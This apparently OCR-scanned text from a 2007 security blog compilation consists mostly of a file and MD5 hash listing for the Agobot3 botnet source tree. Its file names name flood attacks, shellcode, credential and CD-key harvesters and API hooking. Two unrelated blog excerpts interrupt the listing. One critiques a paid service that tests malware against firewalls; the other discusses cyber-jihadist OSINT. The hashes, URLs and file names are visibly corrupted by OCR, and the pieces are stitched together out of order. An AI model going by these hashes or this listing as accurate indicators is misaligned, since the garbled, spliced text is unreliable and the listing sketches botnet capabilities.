2d2977d1c96f487abe4ale202dd03b4e 
redir _http.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


redir https.cpp.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
redir https.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redir socks.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redir socks.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redir_tcp.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
redir _tcp.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
resource.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
rsalib.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
rsalib.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
scanner.cpp.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
scanner.h.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
sdcompat.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sdcompat.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
shellcode.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
shellcode.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
smtp.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
smtp.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
smtp _logic.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
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smtp _logic.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sniffer.cop.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sniffer.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sockets.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sockets.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ssllib.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ssllib.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
synflood.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
todo.txt.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
udpflood.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
utility.cop.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
utility.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
wdscanner.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
wksscanner.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
wonk.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
3dnow.h.svn-base 
ef0d7947ea3fbee875166d804c4db2d7 
agobot3.dsp.svn-base 
488f32c88b17453cc5clcaefeb9e2f37 


agobot3.dsw.svn-base 
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d6c9981589ecbee2 7fcd12f79624bdb4 
agobot3.rc.svn-base 
cb408ea8df789821eba4c5fd16fc5222 
apl.txt.svn-base 
9b12255be30584c0bbc557a979d6cc8a 
baglescanner.cpp.svn-base 
a0d6924b2651dbec8191al1e859e36e30 
bot.cpp.svn-base 
161ed09b3ad26a97c3c2d8eb289db503 
bot.h.svn-base 
1714eaaf97a167cc8679fe21a8bces8 OF 
build.h.svn-base 
2a79b76430b78de84db3bc7a52467d94 
changes.txt.svn-base 
Ofcd0e10c4879d9a272b6891370a0d44 
cmdbase.h.svn-base 
26db6f0199a8036b090e9dd00e316475 
cmdline.cpp.svn-base 
7d1782f3bb300e6459f21009c834d999 
cmdline.h.svn-base 
3b94e2abdfab9092000d46070f96384d 
cmdopt.h.svn-base 
bbf99a918d54f3af9b8b8d3749f6d64e 
cmdshell.cpp.svn-base 
953cc900136d6f2d122fe33ccf3fdf3e 
cmdshell.h.svn-base 
5132962f81afb08c619e63298d108b4b 
commands.cpp.svn-base 
862e80e6357cb358233d6298ff4cfb68 
commands.h.svn-base 
2420ea568387994bd62c7b638ad358df 
consdbg.cpp.svn-base 
f205b9ff0e4df2efccd265174a839e89 
consdbg.h.svn-base 
8ae2f94dc08f997f066f04b4be998a39 
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The following is an automatically translated excerpt : 


"Here are a new feature-check your files against popular firewalls. You send us a file, 
we run it in each individual fayrvole, after full you personal checking account. The cost of 
single use service is $3. A special service for developers, we check your software and your 
otpisyvaemsya subject to the results of the verification. File of our service to circumvent 
firewalls. The cost of the service so far is no different from the usual check. Testing takes 
about 30/40 minutes, the countdown begins once you responded Support "Doc passed 
ordering" Every fifth-free ordering. When paying full use prepaid services. Do not worry about 
sending stay online, with a corresponding demand will be organized kurglosutochnaya work 
24/7/365! List of our firewalls at the moment: ZoneAlarm Pro v7.0; Sygate Personal Firewall 
5.5; Ashampoo FireWall PRO; Sunbelt Personal Firewall; Outpost Internet Security 2008; 
Filseclab Personal Firewall Professional Edition; F-Secure Internet Security 2008; Comodo 
Firewall Pro. 


Every feature is installed on a separate Windows XP Service PAck2, with all the critical 
updates for September 2007. All default. After each check all operatsionki regress back to 
the condition it was prior to the launch your executable file. None of the transferred files, we 
will not be forwarded to third parties, including anti-virus companies, to study the existence 
of malicious code. After verifying the files removed. Now the service does not work in the 
automatic mode, not around the clock, with breaks. We would be happy to cooperate and 
permanent clients." 


Basically, they’re testing whether or not a malware will "phone back home" by running 
it against the popular firewall products, and giving it a green or red light if it does, or if it does 
not pass the test. QA is vital to reliable and bug-free software, but when QA as a concept 
starts getting abused to improve the quality of a malware campaign itself it would improve 
its chances for success, and actually achive it given a bypassing confirmation is already 
anticipated. 


Is this [7]malware QA a trend, or is it a fad? | think it’s a trend mostly because mal- 
ware authors seem to have realized the potential of launching "quality assured malware", take 
[8]storm worm for [9]instance, and the possibility for [10]crunching out DIY malware through 
commodity kits in enormous quantities in the form of a managed malware provider. 


1. ftp: //ddanchev.blogapot.con/2007/0/aynanice~of-aalvare-industry heal 
2, http: /ddanchev. blogspot. com/2007 /08/aalvare-a5-veb- service html 

3. hetp://ddanchev. blogspot. com/2007/08/rats-or-nalware tal 

4. http:/ /seclists,org/fulldisclosure/2007/Aug/0414. html 

5. http: //ddanchev. blogspot. com/2007 /10/sanaged- spanning appliances future-of. heal 
6. http: /Adanchey. blogepot.con/2007 /10/diy-german-nalvare- dropper -htal 

7. http://www. windowsecurity .com/uplarticle/networksecurity/malware-trends . pdf 

8, http: /Adanchev. blogepot.con/2001 /08/storm-vorn-nalvare-back in-game, héal 

9, http: //ddanchev.blogspot.con/2007/09/storn-vorms-fast~flux-networks tal 


ttp://ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese. htm 
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contrib.txt.svn-base 
8399972deefe0714e2e7020ee2808a35 
cplugin.cpp.svn-base 
fd03a3cd1bfb177f92790d61b45b27b7 
cplugin.h.svn-base 
f74efd5d9d520ca42e4b914c62ae51e5 
crypter.cpp.svn-base 
belac4b3907cfd557446f6f48b97f8el 
crypter.h.svn-base 
6730cee1c317ba2de7fa21f5db91c5ae 
cstring.cpp.svn-base 
b9ea3520f46d0255b6a0fb88d1e762f9 
cstring.h.svn-base 
dc7c2de36c1130401d23c10abef7bcc6 
cthread.cpp.svn-base 
325c9294240b2f6ad7d00308a3abf50d 
cthread.h.svn-base 
94d7740c73ca407cdf63b720eb329fbf 
Ccvar.cpp.svn-base 
39a6c177266046a91c4df6080c69234a 
cvar.h.svn-base 
c7b97e74ed6af153db6b7757dcee9c3a 
dcom2scanner.cpp.svn-base 
5f23d2d93235790837580629bce46c5b 
dcomscanner.cpp.svn-base 
a43a85cae7de83d189206754fec5d65e 
ddos.cpp.svn-base 
2ccb7ce6c5cd1caa26da4b68a6762943 
ddos.h.svn-base 
bcde4ab145fe958eff0d0bff62a2fe26 
debug.sh.svn-base 
e€69abc2d15e984622252df96cd1d81al 
disclaimer.txt.svn-base 
e8ce5f964cb192fb125cle27ee8667d5 


doomscanner.cpp.svn-base 


11403 


31cecf00ccc256b8b69af731d38c4e9c 
dwscanner.cpp.svn-base 
8b377245bda4caa9805a6344810d1739 
gpl.txt.svn-base 
393a5ca445f6965873eca0259al17f833 
harvest _aol.cpp.svn-base 
0745c1f9337aabb2da52e934490741e5 
harvest _aol.h.svn-base 
5ca26566806fd76c617804a53601047e 
harvest _cdkeys.cpp.svn-base 
8bf6e1cab329d980b8b04a459a99a2af 
harvest _cdkeys.h.svn-base 
2¢8d4009435f04d4b0195365cf6db3e8 
harvest _emails.cpp.svn-base 
Oafa8141e9b72222bb58bc9d8014867f 
harvest _emails.h.svn-base 
041a05b157a3e79465f9beb0ab6f41esf 
harvest _registry.cpp.svn-base 
dbf72b0beda3fac05423e49f19f9a636 
harvest _registry.h.svn-base 
54f4301af575ece7b020334a57d044f0 
hook.cpp.svn-base 
d0a4ea071585ebf86807cc2fb44cc77c 
hook.h.svn-base 
81692cbbcbda33288e764fcelcelaebe 
httpflood.cpp.svn-base 
47a467c7a9396291386ed253e74f05a8 
installer.cpp.svn-base 
f9d56fd9269f3375b9e2914d2e9f5ae2 
installer.h.svn-base 
44a94935fd86a9728817696175324fic 
irc.cop.svn-base 
33c20db329774ded676a1aa43156f979 
irc.h.svn-base 
eeal7498a62ec0c56ceac220980d46b0 
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ircgate.cpp.svn-base 
4f9371216f50179ed46648dfb9883f37 
ircgate.h.svn-base 
80cb8943ae899d87d9eb2989fc8445de 
junoflood.cpp.svn-base 
5162438538624d2e2391e3d31bbe2aa6 
locscanner.cpp.svn-base 
4fbod88f4e057781c638c6f93979adf4c 
logic.cpp.svn-base 
O8ce6fd0a02d6af21d8641laad9f768de 
logic.h.svn-base 
3eebd3d75213c37818b2bb35c9f40b5c 
mac.cpp.svn-base 
a84ff26fd17f1c084f27daa87fbdc507 
mac.h.svn-base 
4ea570c11fe5223002b33a7089ddbc54 
main.h.svn-base 
19e9cclfed78e89af70a257374c1029f 
mainctrl.cpp.svn-base 
6c7ab1b4082b9f069c105970a6fabce6 
mainctrl.h.svn-base 
5c96f4d11994c61442a4152281f37ef8 
Makefile.bc5.svn-base 
b9cb5ded5983a700afb138817428b519 
Makefile.ming.svn-base 
1889ed95121d6f5394078e65487028ad 
Makefile.svn-base 
343ddb09044d2997a05b3856bacf8057 
Makefile.vc6.svn-base 
c2f9374be2691c56030960150ab8bb7f 
message.h.svn-base 
816b1b7d84db1960642f44e2655c180f 
nbscanner.cpp.svn-base 
b810adb412e3b867e9f18b03aedef15d 
p2p.cpp.svn-base 
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9df216f299c4caf71d74f9e1a50a5181 
p2p.h.svn-base 
33cf9dacal4ed6dcef8ffbd0051680c9 
phaticmp.cpp.svn-base 
5fd424ec4ee918bcb245ef798421dbe7 
phatsyn.cpp.svn-base 
645153e6a5db9e36c3974b78a3aa8b2e 
pingflood.cpp.svn-base 
0d592db99aeab6c9becb4el5d1d3cf3d 
polymorph.cpp.svn-base 
85056a295106b4d7275560cf22e44274 
polymorph.h.svn-base 
cael70a59593ffacab3a898962c6lalc 
random.cpp.svn-base 
d5cc1078d40a30a000cfb5eb59dd28d1 
random.h.svn-base 
00ad1b05e533694170f55f688ac05422 
redirect.cpp.svn-base 
8748b6d0e5a6ca6e711c5ddf636dc451 
redirect.h.svn-base 
698715e7e32del4eaf0257f06abed44e 
redir _gre.cpp.svn-base 
662d3b417cae78cff88bcfea6027d184 
redir_gre.h.svn-base 
b143aaac61fc480e928eccf326fe8ce7 
redir _http.cpp.svn-base 
fe8c2cf0f09dc51bd0173d5ee89bcf02 
redir_http.h.svn-base 
58668d006562809f0ccda593d52f9e01 
redir _https.cpp.svn-base 
db42cf926b9d23921bfc781e941476ea 
redir_https.h.svn-base 
5829e683434a34aec3024c15bb84201d 
redir_socks.cpp.svn-base 
d69b14bf63c7e52c5662614e44e80f9c 
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redir socks.h.svn-base 
82c432c3f3e94eab48c3d156dd3506d7 
redir_tcp.cpp.svn-base 
a25e7ca6f764137a1la7568c007f90292 
redir_tcp.h.svn-base 
a6d756ba1620cf70a5eee22f03b01640 
resource.h.svn-base 
2b7b383879fa48367201leb6efcd93164 
rsalib.cpp.svn-base 
3def23fc50249e85de2ae388cc5bad45 
rsalib.h.svn-base 
c22210651c07e4ad2a5241067f56c3al 
scanner.cpp.svn-base 
5c6c9f46bd718a259e747427969ccacb 
scanner.h.svn-base 
b0e7fe28flbcc3a3c53fc7d3a471a812 
sdcompat.cpp.svn-base 
ce75e8ac16f1b8956ab361e43ae6e2fe 
sdcompat.h.svn-base 
e3d3c73c697cab97599aa3f440f09de9 
shellcode.cpp.svn-base 
a97cf083ac67a9e3a09006272bedf986 
shellcode.h.svn-base 
756ae88719f7771528a3e7dd6247321b 
smtp.cpp.svn-base 
b2aa5cf91a158317e28d102e75c6fccc 
smtp.h.svn-base 
1¢099aa5c145a45d53f285187688846fc 
smtp _logic.cpp.svn-base 
28d67a63c627beee86724586bc62abaa 
smtp _logic.h.svn-base 
ed0789930b4d55784fdf8012bb39e402 
sniffer.cop.svn-base 
827f191faaebele0b6af5aee7da59d0c5 


sniffer.h.svn-base 
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264699ee4ecf70dd1c455f171331e14e 
sockets.cpp.svn-base 
19b2648edac46d38434c5859bb79d38d 
sockets.h.svn-base 
afe300e0252ea4280cbad6be8b3ab9c1 
ssllib.cpp.svn-base 
93f221ee128029091531fd6c2d359d97 
ssllib.h.svn-base 
7f12ceefbo398cc9dd02ca8209a1e693c 
synflood.cpp.svn-base 
44c637f068f38111493e30ae6061e857 
todo.txt.svn-base 
604ff9fea760d20f08ad285c48fb69ce 
udpflood.cpp.svn-base 
1f8aa95a5a34e383b64a6fa6ad813488 
utility.cpp.svn-base 
caf52c16737cdd6edbb3692e969b4ab0 
utility.h.svn-base 
f6503b7f3613a77e535bd284660cefb3 
wdscanner.cpp.svn-base 
ee2ab8ae6bd716942ff34636a51b22a0 
wksscanner.cpp.svn-base 
d519b0cc8f399a44ec333a7cefa77d76 
wonk.cpp.svn-base 
Aff777d62f78b958bad75f1217ec7d03 
config-sample-old.cpp 
€9c775811248523adb6e1ca1316d346b 
config-sample.cpp 
cddb84b3d54d8a5374fe65884343a0bd 
gpl.txt 
393a5ca445f6965873eca0259al17f833 
empty-file 

entries 
9f252bfb6ad0159c4f3a02a1a32d6861 
format 
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48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
config-sample-old.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
config-sample.cpp.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
gpl.txt.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
config-sample-old.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
config-sample.cpp.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
gpl.txt.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
config-sample-old.cpp.svn-base 
€9c775811248523adb6e1ca1316d346b 
config-sample.cpp.svn-base 
cddb84b3d54d8a5374fe65884343a0bd 
gpl.txt.svn-base 
393a5ca445f6965873eca0259al17f833 
crypt.dsp 
f01d6f153b6dceafe3a26482469d6f16 
gpl.txt 
393a5ca445f6965873eca0259al17f833 
main.cpp 6fd0d37d55ad0d2b53645a526843b749 
Makefile c15ebca09466ccd51c504cc73a27599c 
Makefile.bc5 
1752050f741bdc44d119996de06aa409 
Makefile.ming 
07e9627e82bc0efa5cdb53a17799c3f7 
empty-file 

entries 
64aef8d35051cd6980bdb9c00a2fd200 


format 


11409 


48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
crypt.dsp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
gpl.txt.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
main.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.bc5.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.ming.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
crypt.dsp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
gpl.txt.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
main.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.bc5.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile. ming.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
crypt.dsp.svn-base 
f01d6f153b6dceafe3a26482469d6f16 
gpl.txt.svn-base 
393a5ca445f6965873eca0259al17f833 
main.cpp.svn-base 
6fd0d37d55ad0d2b53645a526843b749 
Makefile.bc5.svn-base 
1752050f741bdc44d119996de06aa409 
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Makefile.ming.svn-base 
07e9627e82bc0efa5cdb53a17799c3f7 
Makefile.svn-base 
c15ebca09466ccd51c504cc73a27599c 
crypt.pch 
e€927e2f99c08d29a54d910f67eafd3cl1 
main.obj 790451f99966a65764b9112603192ba4 
vc60.idb f7495aa7ffb84d13f27e00a7c8e4f144 
agobot3.jpg 
a137ca64758c9a0819b8887091e4e735 
agobug.jpg 

8480622 e98fbaff360233ed8b1f2b8df 
commandref.htm| 
fd30868df0bd75ac3596213ccb9b00ed 
faq.html 86ab10e12809d41aa32de2d800f45d88 
gpl.txt 
393a5ca445f6965873eca0259al17f833 
empty-file 

entries 
75424cb8fd1da9e3d9al1176e4e4c4fle 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
agobot3.jpg.svn-base 
c5ace532febc790dbc2ace6a96a9aed0 
agobug.jpg.svn-base 
c5ace532febc790dbc2ace6a96a9aed0 
commandref.html.svn-base 
4160c74de5f4e580dc15660c798ff9Ffc 
faq.html.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
gpl.txt.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
agobot3.jpg.svn-work 
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c5ace532febc790dbc2ace6a96a9aed0 
agobug.jpg.svn-work 
c5ace532febc790dbc2ace6a96a9aed0 
commandref.html.svn-work 
4160c74de5f4e580dc15660c798ff9Ffc 
faq.html.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
gpl.txt.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
agobot3.jpg.svn-base 
a137ca64758c9a0819b8887091e4e735 
agobug.jpg.svn-base 
8480622e98fbaff360233ed8b1f2b8df 
commandref.html.svn-base 
fd30868df0bd75ac3596213ccb9b00ed 
faq.html.svn-base 
86ab10e12809d41aa32de2d800f45d88 
gpl.txt.svn-base 
393a5ca445f6965873eca0259al17f833 
template.cpp 
5b79bc5224e467f6c3b9f5e98617fe27 
template.h 
82fc7acb6a5df848e5aef6a285b47c7ae 
template _priv.cpp 
64191de4261fd379442798bcf3bf9191 
template _priv.h 
568395b8514da8e0ab96a77f43d1d397 
empty-file 

entries 
65364b0d73d94c7448588c8a26059d90 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
template.cpp.svn-base 
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3.10.30 Wisdom of the Anti Cyber Jihadist Crowd (2007-10-29 18:36) 


eee 


sansa ied 


Interesting [Llopinion by Gerald at the [2]Internet Anthropologist Warintel blog : 


"And | want to call this the "Brilliant civilian sector". It included the likes of Bill Roggio, 
Dancho Danchev, Douglas Farah, Ray Robison, team at Counter terrorism Blog, Jamestown, 
Memri, SITE, and many many others. This "Brilliant sector " is missing part of the "Civilian 
War Effort Paradigm". The output has been voluminous and timely and very high quality. But 
it has been aimed at only part of the Demographic. The American or Western sector. The 
"Brilliant sector" recognizes the value of translating terrorist media, documents etc. And their 
analysis is top level. But they seem to have missed the value in translating their analysis into 
indigenous languages, or Arabic at least." 


Wisdom of the opinionated crowds, the value added objectivity due to non-existing de- 
partamental budget allocation battles, combined with state of the art open source intelligence 
gathering for the world’s intelligence community to take advantage of - all courtesy of the 
"Brilliant civilian sector". And why not? While | fully agree with Gerald’s point on translating 
anti-terror PSYOPS material into Arabic, the way cyber jihadists are actively recruiting and 
winning the minds and hearts of English speaking/understanding web surfers, thus radical- 
izing them to the bottom of their brains, it’s also worth mentioning that cyber jihadists are 
already doing it by actively translating English2Arabic the way I’m for instance translating 
Arabic2English - using commercial or free services. Moreover, the way the "brilliant civilian 
sector" is watching video material that they’ve uploaded, they’re also watching news excerpts 
on YouTube, and following everything related to terrorism. Perhaps more research should be 
conducted on the cyber jihadists’ counter surveillance practices, how decent is their level of 
situational awareness, which are their main sources for OSINT, and how influential they are 
so that adequate measures could be taken. One way to do is is by taking [3]a rather big 
sample of outgoing links from their communities in order to better understand their main 
OSINT sources. 


By the way, remember the [4]Caravan of Martyrs which | [5]first mentioned in June, and 
later on crawled knowing it will sooner or later dissapear? It’s now gone with the summer 
wind, for good. 


1. http: //warintel.blogspot .com/2007/10/usa-civilian-terrorist-paradigm-lacking.htm 


2. http://warintel.blogspot .com/ 


3. http: //ddanchev. blogspot .com/2007/08/analyses-of-cyber- jihadist-forums-and.htm 
4. http://caravanofmartyrs.wordpress.com/ 
5. http: //ddanchev. blogspot .com/2007/06/list-of-terrorists-blogs .htm 
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4160c74de5f4e580dc15660c798ff9fc 
template.h.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
template _priv.cpp.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
template _priv.h.svn-base 
4160c74de5f4e580dc15660c798ff9fc 
template.cpp.svn-work 
4160c74de5f4e580dc15660c798ff9Ffc 
template.h.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
template _priv.cpp.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
template _priv.h.svn-work 
4160c74de5f4e580dc15660c798ff9fc 
template.cpp.svn-base 
5b79bc5224e467f6c3b9f5e98617fe27 
template.h.svn-base 
82fc7acb6a5df848e5aef6a285b47c7ae 
template _priv.cpp.svn-base 
64191de4261fd379442798bcf3bf9191 
template _priv.h.svn-base 
568395b8514da8e0ab96a77f43d1d397 
ftplib.cpp 
aeel7072bbe22480a3dd230011cflace 
ftplib.h 1643800fdcb5f8ac02b697172cdd9312 
empty-file 

entries 
67e1582ea5776c4e2d75045d44ce61f9 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
ftplib.cpp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
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ftplib.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
ftplib.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ftplib.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ftplib.cpp.svn-base 
aee17072bbe22480a3dd230011cflace 
ftplib.h.svn-base 
1643800fdcb5f8ac02b697172cdd9312 
getmd5.dsp 
c199e376e31eae102622c8b02d905d0f 
global.h 7608d8e0a03c8d3dcb8fc8995b4c97F4 
gpl.txt 

393a5ca445f6965873eca0259al17f833 
main.cpp cafd9e20c0e2f75a63a552de76fc6300 
Makefile 84d24ae96df293b9c90ad91b8f7a4c9c 
Makefile.bc5 
61f205b522b8141218684247d814388e 
Makefile.ming 
003145b802e07c0125acb162bf7b48ca 

md5.h 

c995fd0563b19a6d6b6f60bc791e46ea 

md5c.c 
c10130aa7b2b270988f4bd06558c1743 
rsaref.h 1082287b3fec7a8c66ebc38754832675 
r_random.c 
add9792642db39757c98711eb50db9b0 
r_random.h 
e375984a0bdee9a816fbaaba55a42c6e 
empty-file 

entries 
52747bbd704271a58deb33686a5dd97b 
format 


48a24b70a0b376535542b996af517398 
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README.txt 
feca2dee1d85784dc846dbac3f878670 
getmd5.dsp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
global.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
gpl.txt.svn-base 
202977d1c96f487abe4ale202dd03b4e 
main.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
Makefile.bc5.svn-base 
202977d1c96f487abe4ale202dd03b4e 
Makefile.ming.svn-base 
202977d1c96f487abe4ale202dd03b4e 
Makefile.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
md5.h.svn-base 
202977d1c96f487abe4ale202dd03b4e 
md5c.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 
rsaref.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
r_random.c.svn-base 
202977d1c96f487abe4ale202dd03b4e 
r_random.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
getmd5.dsp.svn-work 
202977d1c96f487abe4ale202dd03b4e 
global.h.svn-work 
202977d1c96f487abe4ale202dd03b4e 
gpl.txt.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
main.cpp.svn-work 
202977d1c96f487abe4ale202dd03b4e 


Makefile.boc5.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
Makefile. ming.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
Makefile.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
md5.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
md5c.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
rsaref.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
r_random.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
r_random.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
getmd5.dsp.svn-base 
c199e376e31eae102622c8b02d905d0f 
global.h.svn-base 
7608d8e0a03c8d3dcb8fc8995b4c97F4 
gpl.txt.svn-base 
393a5ca445f6965873eca0259al17f833 
main.cpp.svn-base 
cafd9e20c0e2f75a63a552de76fc6300 
Makefile.bc5.svn-base 
61f205b522b8141218684247d814388e 
Makefile.ming.svn-base 
003145b802e07c0125acb162bf7b48ca 
Makefile.svn-base 
84d24ae96df293b9c90ad91b8f7a4c9c 
md5.h.svn-base 
c995fd0563b19a6d6b6f60bc791e46ea 
md5c.c.svn-base 
c10130aa7b2b270988f4bd06558c1743 
rsaref.h.svn-base 
1082287b3fec7a8c66ebc38754832675 
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r_random.c.svn-base 
add9792642db39757c98711eb50db9b0 
r_random.h.svn-base 
e375984a0bdee9a816fbaaba55a42c6e 
getmd5.pch 
f681fea60a259d83aed0b01aae25762d 
main.obj d1c2061a09f3c302acb4f2b3a518b68b 
md5c.obj 422661265de79c2234ee2370aab06e49 
r_random.obj 
50b8a9078ab753d5f7300e78a8b32b12 
vc60.idb 421d83dc5781d6d7d401323d70b90460 
apihijack.cpp 
2fdd99429b54b8c92f1f4caf29cbddeb 
apihijack.h 
30b69595647aa5b77eb52bed2ee419ba 
hookdll.cpp 
8055b4a4d1fb0800771adcf7c87dd1b1 
hookdll.def 
0331893fc8a1539cfd887b938e3d6ble 
hookdll.dsp 
ca3c13a4de68d321ac482d272f8d8e3e 
hookdll.h 
7bbbd7d11dda78cba93df51b061248bd 
empty-file 

entries 
97b7d1cef9b95ce436130eb8bf421fe7 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
apihijack.cpp.svn-base 
202977d1c96f487abe4ale202dd03b4e 
apihijack.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 


hookdll.cpp.svn-base 
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2d2977d1c96f487abe4ale202dd03b4e 
hookdll.def.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
hookdil.dsp.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
hookdll.h.svn-base 
2d2977d1c96f487abe4ale202dd03b4e 
apihijack.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
apihijack.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
hookdll.cpp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
hookdll.def.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
hookdll.dsp.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
hookdll.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
apihijack.cpp.svn-base 
2fdd99429b54b8c92f1f4caf29cbddeb 
apihijack.h.svn-base 
30b69595647aa5b77eb52bed2ee419ba 
hookdll.cpp.svn-base 
8055b4a4d1fb0800771adcf7c87dd1b1 
hookdll.def.svn-base 
0331893fc8a1539cfd887b938e3d6ble 
hookdll.dsp.svn-base 
ca3c13a4de68d321ac482d272f8d8e3e 
hookdll.h.svn-base 
7bbbd7d11dda78cba93df51b061248bd 
empty-file 

entries 
f051f78a1698c537365774f7a6cd273f 
format 
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48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
empty-file 

entries 
3de2b5da6242aeae45d2d8113798d9c0 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
attr.c 
a12fd4f3434414899195949439858f6f 
barrier.c 
532880d3bdd9ef36301d6e7b6aa00d50 
cancel.c 5b13ba000273861c27b9aa50f8bdfc14 
cleanup.c 
769€83413dd9bd33f9e1c81f32b761e2 
condvar.c 
302b1c985cad6f88f933b22b3ec74099 
create.c 6b0ab4004f70c7f20f8flad65aa6133e 
dil.c 
f08714dcbfeaa5e15b142cff5d123beb 
errno.c 
€147795e0a23dac6df29f2546070f789 
exit.c 
d9942ff4e0c679aa9c76bec49172a4cf 
fork.c 
1097a7c18d03a652f6ea2f804f0ccda9 
global.c 0f2567eb987e512d0e0ef6e540d176e7 
implement.h 
0369b8562d00680c8dd5659476b51a67 
misc.c 
f455f6fd65b4a2935alel19bca95abft7 
mutex.c 
cc91625546ca948b067ea08191ed8355 
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need _errno.h 
lacf999ab5165cbb7c0b407eaeb0591d 
nonportable.c 
476e3132b026ce2915f98e505201a129 
private.c 
ac1286d19f9cffded56c450b000d1802 
pthread.c 
71e897b73aa86844be42cce3468991a4 
pthread.h 
c4add0a9376ea64a2723ca3e2c18fcb6 
pthread attr _destroy.c 
5e4c09cc1f07894c258e7adec89ae071 
pthread attr _getdetachstate.c 
a5e3409db651914787d3bbdefdcc02b5 
pthread attr _getinheritsched.c 
8995dfécdeb495fdc3c83b3bb000b92c 
